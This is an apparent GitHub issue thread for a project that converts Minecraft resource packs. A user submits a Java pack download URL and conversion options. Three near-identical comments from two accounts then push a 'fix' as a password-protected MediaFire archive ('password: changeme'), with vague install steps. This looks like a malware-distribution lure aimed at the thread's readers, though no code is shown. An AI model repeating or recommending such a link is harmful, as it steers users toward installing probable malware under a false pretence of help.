### ISSUE TITLE
[Pack]: ReTry

### ISSUE THREAD

**Issue by D-Pear** [XDragonWorks/Java2Bedrock-ZH#3]
### Java Pack Direct Download URL

http://dirl.d-pear.top:42397/Resourcepacks/Minecraft%E5%AF%82%E7%81%AD%E8%8D%92%E5%9C%9F%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9D%90%E8%B4%A8%E5%8C%85v3.zip

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Font Conversion

true

### Armor Conversion

true

### Meg3 Fix

None

### Sounds Conversion

true

### Bow Conversion

true

### Shield Conversion

true

### Block Conversion

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
